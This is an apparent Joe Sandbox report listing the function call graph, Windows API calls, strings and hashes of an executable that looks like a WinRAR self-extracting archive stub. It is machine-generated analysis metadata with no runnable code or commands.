19395->19399 19397 7ff75fbbd9b0 __std_exception_copy 31 API calls 19396->19397 
20253 7ff75fb97720 73 API calls 20251->20253 20251->20255 20254 7ff75fb97720 73 API calls 20252->20254 20252->20255 20253->20255 20254->20255 20255->20225 20257 7ff75fb97688 _snwprintf 20256->20257 20258 7ff75fbba818 swprintf 46 API calls 20257->20258 20259 7ff75fb976a9 20258->20259 20260 7ff75fb9144c 71 API calls 20259->20260 20261 7ff75fb976b8 20260->20261 20262 7ff75fb978cc 73 API calls 20261->20262 20263 7ff75fb91940 20262->20263 20264 7ff75fb97720 20263->20264 20269 7ff75fb97758 20264->20269 20266 7ff75fb9772e 20272 7ff75fbb58d4 20266->20272 20268 7ff75fb97754 20277 7ff75fb94568 20269->20277 20273 7ff75fbb5910 RtlPcToFileHeader 20272->20273 20274 7ff75fbb58f3 20272->20274 20275 7ff75fbb5937 RaiseException 20273->20275 20276 7ff75fbb5928 20273->20276 20274->20273 20275->20268 20276->20275 20278 7ff75fb945a6 memcpy_s 20277->20278 20279 7ff75fba3334 71 API calls 20278->20279 20280 7ff75fb945c7 20279->20280 20280->20266 20282 7ff75fb9e1e2 20281->20282 20283 7ff75fbb38a0 4 API calls 20282->20283 20285 7ff75fb9e207 20283->20285 20284 7ff75fbb38a0 4 API calls 20286 7ff75fb9e231 20284->20286 20285->20284 20286->20232 20290 7ff75fbb38ab 20287->20290 20288 7ff75fbb38c4 20288->20234 20289 7ff75fbbc50c abort 2 API calls 20289->20290 20290->20288 20290->20289 20291 7ff75fbb38ca 20290->20291 20292 7ff75fbb38d5 20291->20292 20301 7ff75fbb3ffc 20291->20301 20305 7ff75fbb401c 20292->20305 20297 7ff75fbb38a0 4 API calls 20296->20297 20298 7ff75fba7490 20297->20298 20300 7ff75fb9892e 20298->20300 20309 7ff75fba2a9c 20298->20309 20300->20237 20302 7ff75fbb400a std::bad_alloc::bad_alloc 20301->20302 20303 7ff75fbb58d4 Concurrency::cancel_current_task 2 API calls 20302->20303 20304 7ff75fbb401b 20303->20304 20306 7ff75fbb402a std::bad_alloc::bad_alloc 20305->20306 20307 7ff75fbb58d4 Concurrency::cancel_current_task 2 API calls 20306->20307 20308 7ff75fbb403b 20307->20308 20310 7ff75fba2ab4 InitializeCriticalSection CreateSemaphoreW CreateEventW 20309->20310 20312 7ff75fba2b27 
20310->20312 20313 7ff75fb97660 73 API calls 20312->20313 20314 7ff75fba2b50 20312->20314 20315 7ff75fba2b3f 20313->20315 20314->20300 20317 7ff75fb97658 20315->20317 20319 7ff75fb9797c 20317->20319 20318 7ff75fb97992 20318->20314 20319->20318 20320 7ff75fbb58d4 Concurrency::cancel_current_task 2 API calls 20319->20320 20321 7ff75fb979b2 20320->20321 20323 7ff75fb9b78c 20322->20323 20324 7ff75fb9b7c0 20323->20324 20350 7ff75fb9b8f8 20323->20350 20324->20239 20326 7ff75fb9b79f 20326->20324 20327 7ff75fb9b7a5 FindClose 20326->20327 20327->20324 20329 7ff75fb99161 _snwprintf 20328->20329 20361 7ff75fb914f8 20329->20361 20331 7ff75fb99177 20332 7ff75fb99187 20331->20332 20369 7ff75fb9b05c 20331->20369 20336 7ff75fb991c0 20332->20336 20374 7ff75fb91b84 20332->20374 20512 7ff75fb9173c 20336->20512 20338 7ff75fb991bc 20338->20336 20345 7ff75fb9b770 7 API calls 20338->20345 20348 7ff75fb9925a 20338->20348 20521 7ff75fb9d25c 20338->20521 20340 7ff75fb99270 20342 7ff75fb992b2 20340->20342 20406 7ff75fba38fc 20340->20406 20414 7ff75fb92178 20342->20414 20345->20338 20346 7ff75fb992be 20346->20336 20418 7ff75fb93fc8 20346->20418 20429 7ff75fb99378 20346->20429 20402 7ff75fb99310 20348->20402 20351 7ff75fb9b91d _snwprintf 20350->20351 20352 7ff75fb9b9a4 FindNextFileW 20351->20352 20353 7ff75fb9b93a FindFirstFileW 20351->20353 20354 7ff75fb9b98e 20352->20354 20355 7ff75fb9b9ae GetLastError 20352->20355 20353->20354 20356 7ff75fb9b94c 20353->20356 20354->20326 20355->20354 20357 7ff75fb9cbcc GetCurrentDirectoryW 20356->20357 20358 7ff75fb9b95e 20357->20358 20359 7ff75fb9b962 FindFirstFileW 20358->20359 20360 7ff75fb9b97d GetLastError 20358->20360 20359->20354 20359->20360 20360->20354 20362 7ff75fb91517 20361->20362 20363 7ff75fb9e1c4 4 API calls 20362->20363 20364 7ff75fb9153b 20363->20364 20365 7ff75fbb38a0 4 API calls 20364->20365 20368 7ff75fb915e9 memcpy_s 20364->20368 20366 7ff75fb915d7 20365->20366 20366->20368 20527 7ff75fb9c4d4 20366->20527 20368->20331 20540 
7ff75fb9a990 20369->20540 20370 7ff75fb9b075 20371 7ff75fb9b079 20370->20371 20550 7ff75fb977cc 20370->20550 20371->20332 20564 7ff75fb9ac90 20374->20564 20375 7ff75fb91d5f 20375->20338 20376 7ff75fb91bd1 20376->20375 20378 7ff75fb91bee 20376->20378 20569 7ff75fb914cc 20376->20569 20378->20375 20380 7ff75fb91da4 20378->20380 20381 7ff75fb91d96 20378->20381 20380->20375 20384 7ff75fb93fc8 108 API calls 20380->20384 20385 7ff75fb91e26 20380->20385 20393 7ff75fb9ae50 79 API calls 20380->20393 20382 7ff75fb9144c 71 API calls 20381->20382 20382->20375 20384->20380 20385->20375 20386 7ff75fb9144c 71 API calls 20385->20386 20388 7ff75fb91e5a 20385->20388 20386->20388 20387 7ff75fb91c74 20387->20378 20581 7ff75fb9ae50 20387->20581 20388->20375 20396 7ff75fb9af60 77 API calls 20388->20396 20390 7ff75fb93fc8 108 API calls 20391 7ff75fb91ea8 20390->20391 20391->20390 20392 7ff75fb91f1d 20391->20392 20395 7ff75fb9ae50 79 API calls 20391->20395 20399 7ff75fb9ae50 79 API calls 20392->20399 20393->20380 20394 7ff75fb9ac90 80 API calls 20394->20378 20395->20391 20396->20391 20397 7ff75fb9ac90 80 API calls 20397->20387 20399->20375 20632 7ff75fb9e2e4 20402->20632 20404 7ff75fba315c GetSystemTime SystemTimeToFileTime 20404->20340 20405 7ff75fb99322 20405->20404 20407 7ff75fbb2548 _snwprintf 20406->20407 20408 7ff75fb9fdf8 48 API calls 20407->20408 20409 7ff75fbb257d 20408->20409 20410 7ff75fb945d8 swprintf 46 API calls 20409->20410 20411 7ff75fbb2592 20410->20411 20412 7ff75fbb1890 16 API calls 20411->20412 20413 7ff75fbb259e 20412->20413 20413->20342 20415 7ff75fb9218f 20414->20415 20417 7ff75fb921b1 20414->20417 20636 7ff75fb91b18 20415->20636 20417->20346 20419 7ff75fb93fde 20418->20419 20427 7ff75fb93fda 20418->20427 20428 7ff75fb9af60 77 API calls 20419->20428 20420 7ff75fb93feb 20421 7ff75fb93fff 20420->20421 20422 7ff75fb9400e 20420->20422 20421->20427 20906 7ff75fb936c8 20421->20906 20949 7ff75fb92b40 20422->20949 20427->20346 20428->20420 20430 7ff75fb9939a _snwprintf 
20429->20430 20433 7ff75fb993db 20430->20433 20436 7ff75fb99415 20430->20436 21117 7ff75fbac574 20430->21117 20432 7ff75fb993f4 20434 7ff75fb9941f 20432->20434 20435 7ff75fb993f9 20432->20435 20433->20432 20433->20436 20437 7ff75fb99492 20433->20437 20434->20436 20439 7ff75fbac574 110 API calls 20434->20439 20435->20436 21144 7ff75fb98790 20435->21144 20436->20346 20437->20436 21071 7ff75fb96294 20437->21071 20439->20436 20513 7ff75fb9175c 20512->20513 21439 7ff75fb9e264 20513->21439 20522 7ff75fb9d28a 20521->20522 20526 7ff75fb9d2cb 20521->20526 20522->20526 21449 7ff75fba3d70 CompareStringW 20522->21449 20524 7ff75fb9d2b8 20524->20526 21450 7ff75fba3d70 CompareStringW 20524->21450 20526->20338 20528 7ff75fb9c4ed 20527->20528 20531 7ff75fb9c5b8 20528->20531 20532 7ff75fb9c5ce memcpy_s 20531->20532 20535 7ff75fba2dd0 20532->20535 20538 7ff75fba2d84 GetCurrentProcess GetProcessAffinityMask 20535->20538 20539 7ff75fb9c544 20538->20539 20539->20368 20542 7ff75fb9a9a6 _snwprintf 20540->20542 20541 7ff75fb9a9ca CreateFileW 20543 7ff75fb9aa40 GetLastError 20541->20543 20544 7ff75fb9aa9e 20541->20544 20542->20541 20545 7ff75fb9cbcc GetCurrentDirectoryW 20543->20545 20548 7ff75fb9aaf8 20544->20548 20549 7ff75fb9aad1 SetFileTime 20544->20549 20546 7ff75fb9aa5b 20545->20546 20546->20544 20547 7ff75fb9aa5f CreateFileW GetLastError 20546->20547 20547->20544 20548->20370 20549->20548 20551 7ff75fb9777c 20550->20551 20558 7ff75fba2a4c 20551->20558 20559 7ff75fba2a55 20558->20559 20560 7ff75fba2a6f 20559->20560 20561 7ff75fb97658 2 API calls 20559->20561 20562 7ff75fba2a89 SetThreadExecutionState 20560->20562 20563 7ff75fb97658 2 API calls 20560->20563 20561->20560 20563->20562 20565 7ff75fb9acb6 20564->20565 20566 7ff75fb9acbd 20564->20566 20565->20376 20566->20565 20568 7ff75fb9a800 GetStdHandle ReadFile GetLastError GetLastError GetFileType 20566->20568 20586 7ff75fb977d8 20566->20586 20568->20566 20600 7ff75fb91804 20569->20600 20571 7ff75fb914ee 20572 7ff75fb9af60 
20571->20572 20573 7ff75fb9af99 20572->20573 20574 7ff75fb9af7d 20572->20574 20575 7ff75fb91c48 20573->20575 20576 7ff75fb9afb1 SetFilePointer 20573->20576 20574->20575 20611 7ff75fb97840 20574->20611 20575->20397 20576->20575 20578 7ff75fb9afce GetLastError 20576->20578 20578->20575 20579 7ff75fb9afd8 20578->20579 20579->20575 20580 7ff75fb97840 75 API calls 20579->20580 20580->20575 20619 7ff75fb9ab80 20581->20619 20584 7ff75fb91d2a 20584->20378 20584->20394 20585 7ff75fb97840 75 API calls 20585->20584 20591 7ff75fb97814 20586->20591 20588 7ff75fb977eb 20589 7ff75fbb58d4 Concurrency::cancel_current_task 2 API calls 20588->20589 20590 7ff75fb97811 20589->20590 20596 7ff75fb92230 20591->20596 20594 7ff75fb978cc 73 API calls 20595 7ff75fb9782f 20594->20595 20595->20588 20597 7ff75fb9227d memcpy_s 20596->20597 20598 7ff75fba3334 71 API calls 20597->20598 20599 7ff75fb922ab 20598->20599 20599->20594 20601 7ff75fb9182b 20600->20601 20610 7ff75fb91897 memcpy_s 20600->20610 20602 7ff75fb91858 20601->20602 20603 7ff75fb97660 73 API calls 20601->20603 20606 7ff75fb918c1 20602->20606 20607 7ff75fb9187b 20602->20607 20604 7ff75fb9184c 20603->20604 20605 7ff75fb97720 73 API calls 20604->20605 20605->20602 20608 7ff75fb97720 73 API calls 20606->20608 20606->20610 20609 7ff75fb97720 73 API calls 20607->20609 20607->20610 20608->20610 20609->20610 20610->20571 20612 7ff75fb9784f 20611->20612 20615 7ff75fb97861 20611->20615 20613 7ff75fb9144c 71 API calls 20612->20613 20614 7ff75fb97859 20613->20614 20616 7ff75fb978cc 73 API calls 20614->20616 20617 7ff75fbb58d4 Concurrency::cancel_current_task 2 API calls 20615->20617 20616->20615 20618 7ff75fb97887 20617->20618 20623 7ff75fb9ab9b _snwprintf 20619->20623 20620 7ff75fb9ac4d SetFilePointer 20621 7ff75fb9abb1 20620->20621 20622 7ff75fb9ac77 GetLastError 20620->20622 20621->20584 20621->20585 20622->20621 20623->20620 20623->20621 20624 7ff75fb9ac33 20623->20624 20626 7ff75fb9a8c8 20623->20626 20624->20620 20627 7ff75fb9a8e7 
20626->20627 20630 7ff75fb9ae50 79 API calls 20627->20630 20628 7ff75fb9a900 20631 7ff75fb9af60 77 API calls 20628->20631 20629 7ff75fb9a910 20629->20624 20630->20628 20631->20629 20633 7ff75fb9e2fa 20632->20633 20635 7ff75fb9e302 20632->20635 20634 7ff75fb9a8c8 79 API calls 20633->20634 20634->20635 20635->20405 20637 7ff75fb91b36 20636->20637 20638 7ff75fb91b3a 20636->20638 20637->20417 20642 7ff75fb91a34 20638->20642 20641 7ff75fb9ae50 79 API calls 20641->20637 20643 7ff75fb91a5b 20642->20643 20645 7ff75fb91a96 20642->20645 20644 7ff75fb93fc8 108 API calls 20643->20644 20648 7ff75fb91a7b 20644->20648 20650 7ff75fb94468 20645->20650 20648->20641 20652 7ff75fb94484 20650->20652 20651 7ff75fb93fc8 108 API calls 20651->20652 20652->20651 20653 7ff75fba2a4c 3 API calls 20652->20653 20654 7ff75fb91abd 20652->20654 20653->20652 20654->20648 21072 7ff75fb962c6 21071->21072 21118 7ff75fbac59c _snwprintf 21117->21118 21119 7ff75fbac6a8 21118->21119 21120 7ff75fb92230 71 API calls 21118->21120 21120->21119 21440 7ff75fb9e27d 21439->21440 21445 7ff75fb9bd88 21440->21445 21442 7ff75fb9e2bf 21443 7ff75fb9bd88 84 API calls 21442->21443 21444 7ff75fb9e2cb 21443->21444 21446 7ff75fb9bd9e 21445->21446 21448 7ff75fb9bda6 21445->21448 21447 7ff75fba2b74 84 API calls 21446->21447 21447->21448 21448->21442 21449->20524 21450->20526 21452 7ff75fbae20c 4 API calls 21451->21452 21453 7ff75fbae1ea 21452->21453 21454 7ff75fbae1f9 21453->21454 21455 7ff75fbae244 4 API calls 21453->21455 21454->19923 21454->19924 21455->21454 21456->19930 21458 7ff75fbae25b 21457->21458 21459 7ff75fbae256 21457->21459 21458->19933 21474 7ff75fbae298 GetDC 21459->21474 21462 7ff75fbae223 21461->21462 21463 7ff75fbae21e 21461->21463 21462->19933 21464 7ff75fbae298 4 API calls 21463->21464 21464->21462 21477 7ff75fbae2e8 GetDC GetDeviceCaps ReleaseDC 21465->21477 21467 7ff75fbae4f7 21468 7ff75fbae501 21467->21468 21469 7ff75fbae510 GetObjectW 21467->21469 21478 7ff75fbae778 GetDC 21468->21478 21472 
7ff75fbae533 21469->21472 21471 7ff75fbae50b 21471->19936 21472->21471 21473 7ff75fbae701 DeleteObject 21472->21473 21473->21471 21475 7ff75fbae2e1 21474->21475 21476 7ff75fbae2ae GetDeviceCaps GetDeviceCaps ReleaseDC 21474->21476 21475->21458 21476->21475 21477->21467 21479 7ff75fbae7b3 21478->21479 21480 7ff75fbae7bf GetObjectW 21479->21480 21481 7ff75fbae7f6 21480->21481 21482 7ff75fbae87e ReleaseDC 21481->21482 21482->21471 21483->19944 21485 7ff75fb9b05c 82 API calls 21484->21485 21486 7ff75fb921f2 21485->21486 21487 7ff75fb921f6 21486->21487 21488 7ff75fb91b84 108 API calls 21486->21488 21487->19952 21487->19953 21489 7ff75fb92204 21488->21489 21489->21487 21490 7ff75fb9144c 71 API calls 21489->21490 21490->21487 21492 7ff75fba0ba2 memcpy_s 21491->21492 21498 7ff75fba0c54 21492->21498 21505 7ff75fba2320 21492->21505 21495 7ff75fba0ce2 GetCurrentProcessId 21504 7ff75fba0cc3 21495->21504 21496 7ff75fba0c86 21499 7ff75fb97660 73 API calls 21496->21499 21496->21504 21497 7ff75fba0c20 GetProcAddress GetProcAddress 21497->21498 21498->21495 21498->21496 21500 7ff75fba0cae 21499->21500 21501 7ff75fb978cc 73 API calls 21500->21501 21502 7ff75fba0cb6 21501->21502 21503 7ff75fb97658 2 API calls 21502->21503 21503->21504 21504->19966 21506 7ff75fbb3900 _snwprintf 21505->21506 21507 7ff75fba232c GetSystemDirectoryW 21506->21507 21508 7ff75fba0c14 21507->21508 21509 7ff75fba234a 21507->21509 21508->21497 21508->21498 21510 7ff75fba2362 LoadLibraryW 21509->21510 21510->21508 21513 7ff75fbad7eb 21511->21513 21512 7ff75fbad987 21512->19984 21512->19989 21513->21512 21514 7ff75fba3da0 CompareStringW 21513->21514 21514->21513 23380 7ff75fbc0b2c 23381 7ff75fbc0b54 23380->23381 23382 7ff75fbc0b4d 23380->23382 23383 7ff75fbc0b8d 23381->23383 23384 7ff75fbc0b5b 23381->23384 23383->23382 23391 7ff75fbc184c 23383->23391 23385 7ff75fbc05d4 abort 15 API calls 23384->23385 23386 7ff75fbc0b66 23385->23386 23388 7ff75fbbda18 __free_lconv_mon 15 API calls 23386->23388 23388->23382 23389 
7ff75fbc0bb8 23390 7ff75fbbda18 __free_lconv_mon 15 API calls 23389->23390 23390->23382 23392 7ff75fbc1854 23391->23392 23393 7ff75fbc1893 23392->23393 23394 7ff75fbc1884 23392->23394 23396 7ff75fbc48c8 32 API calls 23393->23396 23398 7ff75fbc189d 23393->23398 23395 7ff75fbbdedc memcpy_s 15 API calls 23394->23395 23399 7ff75fbc1889 memcpy_s 23395->23399 23396->23398 23397 7ff75fbbdab8 17 API calls 23397->23399 23398->23397 23399->23389 22940 7ff75fbbe440 22941 7ff75fbbe445 22940->22941 22945 7ff75fbbe45a 22940->22945 22946 7ff75fbbe460 22941->22946 22947 7ff75fbbe4a2 22946->22947 22948 7ff75fbbe4aa 22946->22948 22949 7ff75fbbda18 __free_lconv_mon 15 API calls 22947->22949 22950 7ff75fbbda18 __free_lconv_mon 15 API calls 22948->22950 22949->22948 22951 7ff75fbbe4b7 22950->22951 22952 7ff75fbbda18 __free_lconv_mon 15 API calls 22951->22952 22953 7ff75fbbe4c4 22952->22953 22954 7ff75fbbda18 __free_lconv_mon 15 API calls 22953->22954 22955 7ff75fbbe4d1 22954->22955 22956 7ff75fbbda18 __free_lconv_mon 15 API calls 22955->22956 22957 7ff75fbbe4de 22956->22957 22958 7ff75fbbda18 __free_lconv_mon 15 API calls 22957->22958 22959 7ff75fbbe4eb 22958->22959 22960 7ff75fbbda18 __free_lconv_mon 15 API calls 22959->22960 22961 7ff75fbbe4f8 22960->22961 22962 7ff75fbbda18 __free_lconv_mon 15 API calls 22961->22962 22963 7ff75fbbe505 22962->22963 22964 7ff75fbbda18 __free_lconv_mon 15 API calls 22963->22964 22965 7ff75fbbe515 22964->22965 22966 7ff75fbbda18 __free_lconv_mon 15 API calls 22965->22966 22967 7ff75fbbe525 22966->22967 22972 7ff75fbbe244 22967->22972 22986 7ff75fbbff68 EnterCriticalSection 22972->22986 21515 7ff75fbb5d50 21522 7ff75fbb7e5c 21515->21522 21518 7ff75fbb5d5d 21523 7ff75fbb7e64 21522->21523 21525 7ff75fbb7e95 21523->21525 21526 7ff75fbb5d59 21523->21526 21539 7ff75fbb8158 21523->21539 21527 7ff75fbb7ea4 __vcrt_uninitialize_locks DeleteCriticalSection 21525->21527 21526->21518 21528 7ff75fbb5ebc 21526->21528 21527->21526 21554 7ff75fbb802c 21528->21554 21544 
7ff75fbb7edc 21539->21544 21542 7ff75fbb81a3 InitializeCriticalSectionAndSpinCount 21543 7ff75fbb8198 21542->21543 21543->21523 21545 7ff75fbb8003 21544->21545 21546 7ff75fbb7f20 __vcrt_InitializeCriticalSectionEx 21544->21546 21545->21542 21545->21543 21546->21545 21547 7ff75fbb7f4e LoadLibraryW 21546->21547 21548 7ff75fbb7fe5 GetProcAddress 21546->21548 21553 7ff75fbb7f91 LoadLibraryExW 21546->21553 21549 7ff75fbb7f6f GetLastError 21547->21549 21550 7ff75fbb7fc5 21547->21550 21548->21545 21552 7ff75fbb7ff6 21548->21552 21549->21546 21550->21548 21551 7ff75fbb7fdc FreeLibrary 21550->21551 21551->21548 21552->21545 21553->21546 21553->21550 21555 7ff75fbb7edc __vcrt_InitializeCriticalSectionEx 5 API calls 21554->21555 21556 7ff75fbb8051 TlsAlloc 21555->21556 21561 7ff75fbb2e4a 21562 7ff75fbb3490 14 API calls 21561->21562 21563 7ff75fbb2e89 21562->21563 21570 7ff75fbc184c 21571 7ff75fbc1854 21570->21571 21572 7ff75fbc1893 21571->21572 21573 7ff75fbc1884 21571->21573 21577 7ff75fbc189d 21572->21577 21591 7ff75fbc48c8 21572->21591 21574 7ff75fbbdedc memcpy_s 15 API calls 21573->21574 21578 7ff75fbc1889 memcpy_s 21574->21578 21579 7ff75fbbdab8 21577->21579 21580 7ff75fbbdad7 21579->21580 21581 7ff75fbbdacd 21579->21581 21583 7ff75fbbdadc 21580->21583 21589 7ff75fbbdae3 abort 21580->21589 21582 7ff75fbbda58 _snwprintf 16 API calls 21581->21582 21586 7ff75fbbdad5 21582->21586 21584 7ff75fbbda18 __free_lconv_mon 15 API calls 21583->21584 21584->21586 21585 7ff75fbbdb22 21587 7ff75fbbdedc memcpy_s 15 API calls 21585->21587 21586->21578 21587->21586 21588 7ff75fbbdb0c HeapReAlloc 21588->21586 21588->21589 21589->21585 21589->21588 21590 7ff75fbbc50c abort 2 API calls 21589->21590 21590->21589 21592 7ff75fbc48d1 21591->21592 21593 7ff75fbc48ea HeapSize 21591->21593 21594 7ff75fbbdedc memcpy_s 15 API calls 21592->21594 21595 7ff75fbc48d6 21594->21595 21596 7ff75fbbdd48 _invalid_parameter_noinfo 31 API calls 21595->21596 21597 7ff75fbc48e1 21596->21597 21597->21577

Control-flow Graph (legend: Executed / Not Executed)
Memory Dump Source
• Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
• Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
Similarity
• API ID: Item$Text$ButtonCheckedMessageswprintf$File$DialogErrorLastWindow$LoadLongStringView$CloseCommandCountCreateDispatchEnableFocusHandleLineMappingModuleNameParamSendSleepTickTranslateUnmapwcscpy
• String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$@$C:\Users\user\AppData\Local\Temp\7zS49DD90FA$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$p$runas$winrarsfxmappingfile.tmp
• API String ID: 1377943202-88273296
• Opcode ID: 959ec2e3c6c340ac9f8615344b3a6b339079ba82ea2973b9d65de183914b3949
• Instruction ID: 34dc9724fade48506b263d75f7beb73a6a027fd25cfd669b48d0037215533ceb
• Opcode Fuzzy Hash: 959ec2e3c6c340ac9f8615344b3a6b339079ba82ea2973b9d65de183914b3949
• Instruction Fuzzy Hash: A862AE64E0D6C3C6FB24BB31E9502FAA7A5AF45BC4FCC0139D94D076A6DE3CA5098361
Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
• Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Item$AttributesText$ButtonCheckedMoveswprintfwcscat$CloseCompareDeleteDialogEnvironmentExpandOpenPathQueryStringStringsTempValue
                                                                                                                                                                                                              • String ID: %s%s%u$%s.%d.tmp$.lnk$<br>$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                                                                                              • API String ID: 2559350931-2038501859
                                                                                                                                                                                                              • Opcode ID: f128066c9a7e88468d207f8392582c3a5e4d09d75c8970ceb165e7de9b4ce247
                                                                                                                                                                                                              • Instruction ID: 63a1909dde3bed571a7bd5fecb133b932379a0418ba7e0fcd7dcbfe881686210
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f128066c9a7e88468d207f8392582c3a5e4d09d75c8970ceb165e7de9b4ce247
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D825C62A186C3D9EB31BB31D8402FDA365FF40784FC84136D94D47A99EE6CEA45C364
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
                                                                                                                                                                                                              • String ID: $%s:$CAPTION
                                                                                                                                                                                                              • API String ID: 1936833115-404845831
                                                                                                                                                                                                              • Opcode ID: 72e7e3ee6b17742e4cb2673df9a41092cb36fe08a2d3d22740af7c269679d036
                                                                                                                                                                                                              • Instruction ID: 00a3044e3a1c4356180e49b4488a0a4e20b4d767e0b9249c9a3166a89e09a9e5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72e7e3ee6b17742e4cb2673df9a41092cb36fe08a2d3d22740af7c269679d036
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1891D972B1868287E714DF39E9406AAE7A1FB84784F885135EE4D47B98CF3CE805CB10
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 869497890-0
                                                                                                                                                                                                              • Opcode ID: 03fc193e635db437b7016961caeff27e2e61dad9e90c9a20ddae6e7681612538
                                                                                                                                                                                                              • Instruction ID: d9aaa77ebb12bef8d5819c31c9030c4b265b5a37338482d8f13b4cce366c6dda
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03fc193e635db437b7016961caeff27e2e61dad9e90c9a20ddae6e7681612538
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C416072618AC1D6DA24AB35D5402E9A3A0FB48BE0F884332EBBD437C5CF7CD6558710
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: CMT$h%u$hc%u
                                                                                                                                                                                                              • API String ID: 0-3282847064
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

Control-flow Graph (graph not preserved)
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcessswprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreePointerReadSleepStringSystemVersionWrite
